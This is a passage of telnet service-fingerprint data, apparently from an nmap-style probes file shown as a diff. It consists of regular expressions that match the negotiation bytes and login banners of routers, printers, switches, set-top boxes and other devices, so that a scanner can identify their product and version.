-\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05\r\nCLI access not allowed until the SCC is active\.\r\n\r\n -\xff\xfb\x01\n?\r\n\r?VxWorks login: -\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nVxWorks login: -\xff\xfb\x01\r\n\rPassword: | p|ZyXEL Prestige/Efficient Speedstream adsl router telnetd -\xff\xfb\x03\xff\xfb\x01password: -\r\n\xff\xfb\x01Enter password: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\w+ login: -\xff\xfb\x01\xff\xfb\x03\r\n\(\w+\) \r\nUser: -login: \xff\xfb\x01\xff\xfb\x03| p|USRobotics/Sagem router telnetd -\xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd\0login: -220 FTP server \(ver 1\.0\) ready\.\r\n -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on dslmodem login: -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\xff\xfd\x18 -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nlogin: -\r\nSystem unavailable\. Please try later\.\r\n -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n(FVS\w+) login: -\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03Login Name: -\xff\xfb\x01\xff\xfe\"\r\n\* -\xff\xfb\x03\xff\xfb\x01\r\n Disconnecting\.\.\.\r\n\n -\xff\xfb\x01\xff\xfb\x03\x1b\[2J\x1b\[0;0H\x1b\[K\x1b\[7mTelnet configuration RELEASE ([\d.]+)\x1b -Telnet server disabled\r\n -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n login: -\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03\r\r\n([\w._-]+) login: -\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03([\w._-]+) login: -\r\n.*Based\(loosely\) on CircleMUD ([\d.]+) -\r\n.*Based on CircleMUD ([\w._-]+),\r\n -\x1b\[0;37;40m\x1b\[2J\x1b\[0;37;40m\x1b\[1m\x1b\[15;22HAT-(\w+), version ([\d.]+)\x1b -\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;0H\x1b\[0J\x1b\[0;0H\x1b\[0J\x1b\[1;28HAT-([-\w_.]+) Login Menu\x1b\[5;18HAT-[-\w_.]+ Local Management System Version ([\d.]+) \x1b -\xff\xfd\x03\xff\xfb\x01\x1b\[2J\x1b\[1;1H\x1b\[0m\x1b\[\?3l\x1b\(0\x1b\[2;40H\x1b\(B\x1b\(0\x1b\[2;28H\x1b\(BCSX([-\w_.]+) Local Management\x1b\[0m\x1b\(0\x1b\[5;24H\x1b\(BCABLETRON Systems, Incorporated\x1b -\xff\xfb\x01\n\rno data rcvd for version string\n\rrecv version id unsuccessful\n\rSSH Session task 0x\w+: Version Exchange Failed\n\r -\r\nSorry, this system is engaged\.\r\n -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on \(none\) login: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on ([-\w_.]+) login: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \( -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v(.*) Built-in shell \(ash\)\r\n -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\(none\) login: -\xff\xfb\x01Hummingbird Communications Ltd\., Windows NT, Telnetd Version ([\d.]+) \(([-\w_.]+)\)\r\n\r\n login: -\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Login Name: -\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Password: -\xff\xfb\x01\xff\xfb\x03BR-telnet@FI_Core> -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\x1b\[\?3l\x1b\[2JPlease enter your user name and password!! \r\n\r\nLogin: -\xff\xfb\x01\r\nD-Link Access Point login: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03.*\r\n([-\w_.]+) login: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Login failed\.\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\nPON 262194 PAAMCO (TA \w+) Gen3\r\n\n\n\ruser: -\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\r\n\r\r\nUser Name: -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ([-\w_.]+)\n\r +\*+\n\r\n\rD-Link Corp\., Inc\. Software Release ([-\w_.)(/]+)\n\rCopyright \(c\) \d+-\d+ by D-Link Corp\., Inc\.\n\r\n\rlogin: -\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nUsing telnet exposes your password\. Using ssh is a safer choice\.\r\n\r\nUsername: -\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01\r\n\r\nPIX passwd: -\xff\xfb\x01\r\n#-+\r\n# Tasman Networks Inc\. Telnet Login\r\n# -\xff\xfd\x03\xff\xfb\x01\r\n\r\n\t\tWelcome to P333R\r\n\t\tSW version ([\d.]+)\r\n\r\n\r\nLogin: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm7000 Helenite \d+ \(based on [-\w_.]+\)\r\n\rwelcome on your dreambox! - Kernel ([-\w_.]+) -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r[ *\r\n]*Welcome on your dreambox! - Kernel (\d[\w.]+) -\xff\xfe\"\xff\xfb\x01 \x1b\[H\x1b\[J\x1b\[3;1HCB-1000 S/N: (\d+)\x1b\[3;56HSymbol Technologies, Inc\.\x1b\[4;1HVersion ([-\w_.]+)\x1b\[4;44HEthernet HW address ([\w:]+)\x1b\[21;1H -\x1b\[\?25l\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H\x1b\[2;1H\x1b\[3;1H\x1b\[4;1H ### ### ########### ########## ############# ########### ###\x1b\[5;1H #### ### ############# ############ ############# ########### ###\x1b\[6;1H[ #]{70}\x1b\[7;1H[ #]{70}\x1b\[8;1H[ #]{70}\x1b\[9;1H[ #]{70}\x1b\[10;1H[ #]{70}\x1b\[11;1H[ #]{70}\x1b\[12;1H[ #]{78}\x1b\[13;1H[ #]{78}\x1b\[14;1H\x1b\[15;1H\x1b\[16;1HEnter Ctrl-Y to begin\.\x1b\[18;3H\*{35} -\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* -\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to D-Link Wireless Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0+\r\nServer Model : ([\w._+-]+)\0+\r\nF/W Version : ([\w._-]+)\0.\0+\r\nMAC Address : ([\w ]+) -\xff\xfb\x01\xff\xfb\x03\r\n\r\n\x1b\[H\x1b\[JWelcome at ActiveFax Server\.\r\n\r\n -\xff\xfb\x01\xff\xfb\x03RemoteX Telnet Server V([\d.]+)\n\r\n\rc:\\> -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ZXDSL 831\n\r +\*+\n\r\n\rZTE Corporation, Software Release VIK-([-\w_.]+)\n\r -match telnet m%^\xff\xfe\x01\r\n\r\n\+=+\+\r\n\| +\[ MGE UPS SYSTEMS SNMP/Web agent Configuration menu \]% p/MGE UPS telnetd/ d/power-device/ -\*{60}\r\n\r\nThis session allows you to set the TCPIP parameters for your\r\nDell Laser Printer Printer Dell (\w+) MFP Ethernet internal network device, with a hardware\r\naddress of ([0-9A-F:]{17}) \(MSB, Canonical\)\.\r\nIt's an ethernet card\.\r\nNetwork Firmware Version is V([\w._-]+)\(\w+ MFP\) ([\d-]+)\.\r\nSystem Up Time is ([^\r\n.]+)\.\r\n\r\n -\xff\xfb\"\xff\xfb\x03\xff\xfb\x01\xff\xfb\0\xff\xfd\0\n\r\nWelcome to the PDP-10 simulator\r\n\n -\xff\xfb\x01\(Enable\) Password\? -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\r\nCGX3224 Switch Manager Console\. Version: CGX([\d.]+) Bld (\d+),.*\r\n\r\nPassword: -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[01;00H\r\n\r\0\r\n\r\0[ \t]+\r\n\r\0\r\n\r\0\r\0VersaXpress HPNA Routing Concentrator\r\n -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nSportster Pro ([\d.]+) Image Sagem D-BOX2 - Kernel ([-\w_.]+) -\xff\xfb\x01\xff\xfb\x03\r\0\n\*\*\* Lantronix Universal Device Server \*\*\*\r\0\nSerial Number (\d+) MAC address ([\w:]+)\n\r\0Software version 0*([\d.]+) \((\d+)\)\r\0\n\r\0\nPress Enter to go into Setup Mode \r\0\n -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Fritz!Box web password: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nFritz!Box web password: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([-\w_+. ]+) Date: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([^\r\n]+)\r\n -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03DD-WRT (v\d+)[^\r\n]*\r\nRelease: ([^\r\n]+)\r\n\xff\r\ngateway login: -\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd\x1f\xff\xfd'\xff\xfd\ -\xff\xfb\x03\xff\xfb\x01\r\n\r\nU\.S\. Robotics\r\nTotal Control \(tm\) NETServer 8/16\r\n\r\nlogin: | p|USRobotics TotalControl NetServer 8/16 telnetd -\xff\xfb\x01\r\n\r\n\*\*\* ADTRAN TSU ESP \*\*\*\r\n\r\n ENTER PASSWORD -> \xff\xfd\x03\xff\xfb\x03 -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix (SCS\d+) Version V([\d/().]+)\n\r\nType HELP -\xff\xfb\x03\xff\xfb\x01\r\n\r\nPassword : -\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 1998-2006 Huawei Technologies Co\., Ltd\. All rights reserved\. \*\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X2301 version V\.([-\w_+. ()]+) IPSec from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r *\**\n\r *Welcome to Viking II\. \n\r *\**\n\r\n\rGlobespanVirata Inc\., Software Release VIK-([-\w_.]+)\n\r -\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[1;1H\x1b\[J\x1b\[22;0H>\x1b\[1K\x1b\[999D\r\0login: -\x1b\[2J\x1b\[1;1fATOS Telnet Server\r\n\r\nCTRL\+d to exit\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03Init Command Line Interface\.\. \r\nBoot Version: [\d.]+\r\nBoot Date: [\d :/]+\r\nATOS Version: ([\d.]+) \([^)]+\)\r\nATOS Date: [\d :/]+\r\nHardware: \w+\r\nProduct Code : \d+\r\nSerial Number : (\d+)\r\nLAN0 MAC Address : ([A-F0-9:]+)\r\nADSL Modem SW version: [\w._-]+ *\r\nADSL Modem API version: \d+\r\nADSL Driver version: [\w._-]+\r\n([\w._-]+) release: ([\w._-]+)+\r\nHW encryption not supported\r\nVinetic fw version : [\w._-]+\r\n\r\nUser name : -\xff\xfb\x01\xff\xfe\x01\n\r\n\r\n\r\n\n\n\n\r\t=+\n\r\t +Samsung SWL-6100AP Configuration\n\r\t -\xff\xfb\x01\xff\xfb\x03\r\0\nMAC address (\w+)\n\r\0Software version ([\w._-]+ \(\d+\)) XPTEXE\r\0\n\n\r\0Press Enter to go into Setup Mode \n\r\0 -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03USR ADSL Gateway\r\nLogin: -\xff\xfb\x03\xff\xfb\x01\r\nService Processor login: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03ADSL2\+ Wireless Router (\w+) \r\nSoftware Version: ([\w.]+)\r\nLogin name: -\xff\xfb\x01Symbol Access Point User/Admin password: -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\xff\xfe\"\xff\xfc\"Username Access Verification\r\n\r\nLogin : -\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to Telnet Server ([\w._-]+)\r\n\x1b\[0m\x1b\[2J\x1b\[05;28H(SM\w+) Managed Switch\x1b\[07;22H\x7fTallahasseeAdmin-Block\x1b\[15;30Husername:\x1b\[17;30Hpassword:\x1b\[15;39H -\r\n\r\nPassword required, but none set\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1fWelcome to your TiVo\r\n\r\n=\[tivo:root\]-# -\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03AMBIT Cable Modem\r\n\r\nlogin: -refused in\.telnetd from [-\w_.]+ logged\n -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Access DENIED\.\r\n -match telnet m=\xff\xfb\x01\r\n\r\n#\r\n\| Siemens I-Gate LAN 2\r\n\| Ver\. ([\d.]+) / [\d.]+\r\n\| SN\. (\w+)\r\n\|= p/Siemens I-Gate LAN 2 telnetd/ v/1/ i/Serial 2/ d/router/ -\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;.*Business Policy Switch 2000 -BeanShell ([-\w_.]+) - by Pat Niemeyer \(pat@pat\.net\)\nbsh % -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\r\n\(Aruba800\) \r\nUser: -\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;1H\x1b.*BayStack 420 -\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03SHARP (MX-\w+) Ver ([-\w_.]+) TELNET server\. -\xff\xfb\x01\xff\xfb\x03Welcome to (DCS-\w+) telnet daemon\r\n\r\nPassword: -\xff\xfb\x01\r\nVoIP Phone V([-\w_.]+) settings\r\nPassword: -\xff\xfb\x01\r\nAIRAYA login: -\xff.\x01\0?\xff\xfd.*Welcome to ViewStation.*Password: -AD6680 Gateway Software\r\n[-\w_]+ \(MAC ([\w:]+)\)\r\n -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nHP ProLiant BL p-Class C-GbE2 Interconnect Switch A\.\r\n -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Netgear DM111 ADSL2\+ Modem \r\nSoftware Version: ([-\w_.]+)\r\nLogin name: -\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0\0\0\0\0\0\r\nServer Model : 2U1P Print Server\0+\r\nF/W Version : ([\w._-]+).*\r\nMAC Address : ([\w ]+) -\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\r\n\r\nMMC Technology Telnet\r\nMW-3000AP \w+\( Combo ([-\w_.]+) \)\r\n\r\n -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r.*\n\r\n\rSoftware Release R([-\w_.]+)\([^)]+\)\n\rCopyright \(c\) 2001-2003 by D-Link, Inc\.\n\r\n\rlogin: -\xff\xfb\x03\xff\xfb\x01\r\nWelcome to the WhatRoute TELNET Server\.\r\n -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nCNU-550pro login: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03picotux login: -\xff\xfb\x03\xff\xfd\x18\xff\xfb\x01\xff\xfd\x1f\xff\xfd!\r\nCadant C3 CMTS\r\n -\r\n\(c\) Copyright 2005, Extron Electronics, IPL T S2, V([\d.]+), -\xff\xfb\x01\xff\xfb\x03\r\n.*HM410dp ADSL2\+ Router\r\n\r\nLogin: -\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03NS-30G Ver ([-\w_.]+) TELNET server\.\r\0\nCopyright \(c\) \d+ KYOCERA -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X4100 version V\.([-\w_.]+) Rev\. (\d+) \(Patch (\d+)\) from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), -\xff\xfe\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: -\xff\xfb\x03\xff\xfb\x01\r\nZyXEL Corporation Embedded Telnet Server \(c\) 2000-2003\r\n -\xff\xfb\x01\xff\xfb\x03\*\*\* Lantronix UDS1100 Device Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) \r\0\nPassword : -\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 2004-2006 3Com Corp\. and its licensors\. -\xff\xfd\x03\xff\xfb\x01\r\n\r\nProduct type: Avaya (\w+) Media Gateway Release ([\w._-]+)\r\n\r\n\r\n\r\nLogin: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm500 Jade \d+ \(based on ([\w._-]+)\)\r\n\rwelcome on your dreambox! - Kernel ([\w._-]+) \([\d:]+\)\.\r\n\rdm500 login: -\r\nSorry, this system is engaged by a rlogin session\.\r\nHost IP address: ([\d.]+)\.\nLogin name: ([\w._-]+)\.\n -\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\n\r\nUser Access Verification\r\n\r\nUsername: -Connected\r\nUse log command to LOGON\r\n -\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) Command Shell\r\nPassword: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) V([\w.]+) Command Shell -match telnet m=^\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03ADSL Router\r\nLogin (?:user|name): = p/ADSL router telnet config/ d/broadband router/ -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4021\r\nLogin: -\xff\xfb\x01\xff\xfb\x03\n\r\0SNTP Version ([\d.]+) Server ([\w._-]+)\n\r\0\r\0\nMAC address (\w+)\n\r\0Software version V[\d.]+ \(\d+\) ([\w._-]+)\r\0\nPassword : -uShare \(([\w._-]+)\) \(Built .*\)\nFor a list of registered commands type \"help\"\n\n> -SMPlayer ([\w._-]+)\r\nType help for a list of commands\r\n -Sorry, already connected\.\r\n| p|Slirp PPP/SLIP-on-terminal emulator telnetd -\xff\xfb\x03\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\r\nCopperJet ([\w._-]+) RouterPlus .*\r\nFirmware version: ([\w._ -]+)\r\nAllied Data Technologies\r\n\r\nPlease login: -\xff\xfb\x01\xff\xfb\x03Welcome to the Windows CE Telnet service on MP370\r\n\r\nPocket CMD v ([\w._-]+)\r\n\\> \n\r\n\\> \\> -\xff\xfb\x01\r\n3Com Access Point 7760 login: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 login: -\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03PRICOM 3100 Ver ([\w._-]+) TELNET server\.\r\0\nCopyright \(C\) 2002-2004 silex technology, Inc\.\r\0\nlogin: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\r\n\r\r\nWelcome to Aerohive Wireless Product\r\r\n\r\r\nlogin: -\xff\xfb\x01\xff\xfb\x03\r\nLexmark International Telnet\r\n\r\nlogin: -\xff\xfb\x03\xff\xfb\x01Alcatel-Lucent: A7510\r\nA7510_(R\d+) .*\r\n\r\n\r\nLogin: -\xff\xfd\x18\xff\xfd\x1f\xff\xfd!\xff\xfd\x17\xff\xfb\x01\xff\xfb\x03\xff\xfd \xff\xfd#\r\n\r\n Welcome to OpenVMS \(TM\) VAX Operating System, Version V([\w._-]+) \r\n\r\n\r\0Username: -\xff\xfb\x01\xff\xfb\x03\r\n\r\n>>> System ([\w._-]+) - OpenVMS Alpha V([\w._-]+) <<<\r\n\r\n\rUsername: -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nGbE2c L2/L3 Ethernet Blade Switch for HP c-Class BladeSystem\.\r\n\r\nCopyright\(C\)2003 Hewlett-Packard Development Company, L\.P\.\r\n\r\n\r\nEnter tacacs username: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03U\.S\. Robotics ADSL 4-Port Router\r\nLogin: -\xff\xfb\x01\xff\xfb\x03\n\r\0\*\*\* Mitsubishi ProjectorView Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) MELCO\r\0\n\n\r\0Press Enter for Setup Mode \n\r\0 -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n === IMPORTANT ============================\r\n Use 'passwd' to set your login password\r\n this will disable telnet and enable SSH\r\n ------------------------------------------\r\n\r\n\r\nBusyBox v(.*) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n ___ ___ ___ \r\n\( _`\\ _ /'___\)'___\) Bifferboard mini-distribution v([\w._-]+)\r\n -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 =======================\r\n DSL-500B \r\n =======================\r\nLogin: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWelcome to Linux \(ZEM500\) for MIPS\r\n\rKernel ([\w._-]+) \w+ on an MIPS\r\n\rZEM500 login: -\xff\xfb\x01\xff\xfe\x01Connected\r\n\n\rAironet BR500E V([\w._-]+) Main Menu -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TrioLink \(ADSL IAD\)\r\nLogin: -Linux ([\w._-]+) \[INSTALL: [\d-]+\]\nLASTPATCH: [\d:-]+\n -\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\x1b\[0;37;40m\x1b\[2J\x1b\[1;1HLogin Name: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Xcelerator IP \r\nLogin: -odec=\d+ u=\d+, p=\d+, i=\d+, max entries = \d+ \r\n\d+: IMGREQUEST: request_stats, image buffers available = \d+ \r\n\d+: MAIN: (\d+) images\(J=\d+, P=\d+, I=\d+\) stored on disk in last minute -\r\nSiemens 5940 T1E1 \[COMBO\] Router \([\w._-]+\) v([\w._-]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: -\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to Dinion-IP-NWC [\d.]+ from [\d.]+\r\n -\xff\xfb\x03\xff\xfb\x01\xff\xfe\x01\xff\xfd\0\r\nser2net port \d+ device (/dev/[-\w_]+) \[\d+ \w+\] \(Debian GNU/Linux\)\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rTerminal shell v1\.0\n\r\rCopyright \xa92008 Motorola, Inc\. All rights reserved\.\n\r\rNetopia Model ([\d-]+)(?: AnnexA)? High-Power Wireless DSL Ethernet Managed Switch\n\rRunning Netopia SOC OS version ([\w.-]+ \(build \w+\))\n -\xff\xfb\x01\xff\xfb\x03ssss ssss sss s ss sss sss sss sssss \r\n s s s s s s s s s s s s s \r\n s s s s s s s s s s s \r\n s s ss s ss ssss s sss s ssss s s sss \r\n s s s s s s s s s s s s s s s \r\n s s s s s s s sss s s s s s s \r\n s s s s s s s s s s s s s s s s s \r\nssss ssss ssssss sss sss sssss ss sssss sss sss sssss\r\nLogin: -\r\nPRO2 Control Console\r\n -\w{12}\r\nETHMAC ([0-9a-f:]+)\r\nWIFIMAC ([0-9a-f:]+)\r\n> -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWireless AP Manager Console [^\r\n]+\r\n please enter your password: -\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05Login: -\xff\xfb\x01\xff\xfb\x03\r\n\r\nYou are connected to configuration tool\r\nEnter the password: -match telnet m%\xff\xfe\x01\r\n\r\n\+============================================================================\+\r\n\| \[ interSeptor Configuration Utility Main Menu \] \|\r\n\+============================================================================\+\r\n\r\nEnter Password: % p/Jacarta interSeptor environmental monitor telnetd/ d/specialized/ -match telnet m=^\xff\xfb\x01\xff\xfb\x03\r\n ,vvvdP9P\?\?\?\^ ,,,\r\n vvd###P\^`\^ vvvvv v\r\n vv#####\?\^ \?\?\?\?####vv,\r\n vv####\?\? ,vvvdP\?\?\?\^ ,,, \?\?##\^\r\n v#####\? ,vvd##P\?\^ #\?#v#vvv\r\n v#####\? v###P\^ ,vvv, '\?#\?,\r\n ######\? ####\?\^ ,vd#P\?\^ `\?\?\?##\r\n #####\? v#### ,d##P\^ ''\r\n ###### v#### \]###L _ _ _ ___\r\n #####\? v#### \]##L / / \\ \|\\ \| \|_ \\/ /\\ \|\\ \| \|\r\n ###### #### \]###L \\_ \\_/ \| \\\| \|_ /\\ /--\\ \| \\\| \|\r\n= p/Zoom X6 ADSL router telnetd/ d/broadband router/ -\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05\r\n\*\*\* Welcome to VTM \*\*\*\r\n\r\n\r\n\rLogin : -\r\nCEN-IDOC Control Console\r\n\r\nCEN-IDOC> -\xff\xfb\x01\r\nWelcome to Ring v([\d.]+) Copyright \(C\) AMX Corp\. 2002-2003\r\n -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TESTING MODEL ADSL Router\r\nLogin: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\[([^]]*)\]\[([^]]*)\]\[([^]]*)\]\r\n -\xff\xfe\"\xff\xfb\x01\x1b<\x1b>\x1b\[\?25l\x1b\[0m\x1b\[2J\x1b\(B\x1b\)0\x0f\x1b\[7m\x1b\[f Areca Technology Corporation RAID Controller -\xff\xfb\x01\xff\xfb\x03\r\n\r\n\r\n\r\n\*{76}\r\n\r\n +Minolta Network Configuration Utility\r\n +Minolta\r\n +Version ([\w.]+)\r\n -\xff\xfd\x03\xff\xfe\x01\xff\xfb\x01\s+ZebraNet Internal Wired PS Configuration Utility\r\n\r\n Type your password\. Press Enter when finished\.\r\n\r\n Password: -\xff\xfb\x01\n\rWelcome to TrueTime Network Interface\n\r\rUser name: -MythFrontend Network Control\r\nType 'help' for usage information\r\n---------------------------------\r\n# -\x1b\[0m\r\nWelcome to (IC-\d+)!\r\n\r\n\x1b7\x1b\[\?25l\x1b\[501;501H\x1b\[6n\x1b8\x1b\[\?25h\r\x1b\[0m\x1b\[1mIC-\d+ # \x1b\[0m\x1b\[J\r\x1b\[10C -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x0c\x1b\[2JEnter Password: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\r\n\rWelcome to DreamBox\.\r\n\rRunning under Kernel ([\w._-]+) \.\r\n\rBased on (Gemini [\w._-]+ GUI)\.\r\n\rKernel and utilities compiled by SatDream\.\r\n\r\r\n\r\r\n\rhttp://www\.satderam\.ru , info@satdream\.ru , dreambox@satdream\.ru\r\n -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nBNT Layer 2/3 Copper Gigabit Ethernet Switch Module for IBM 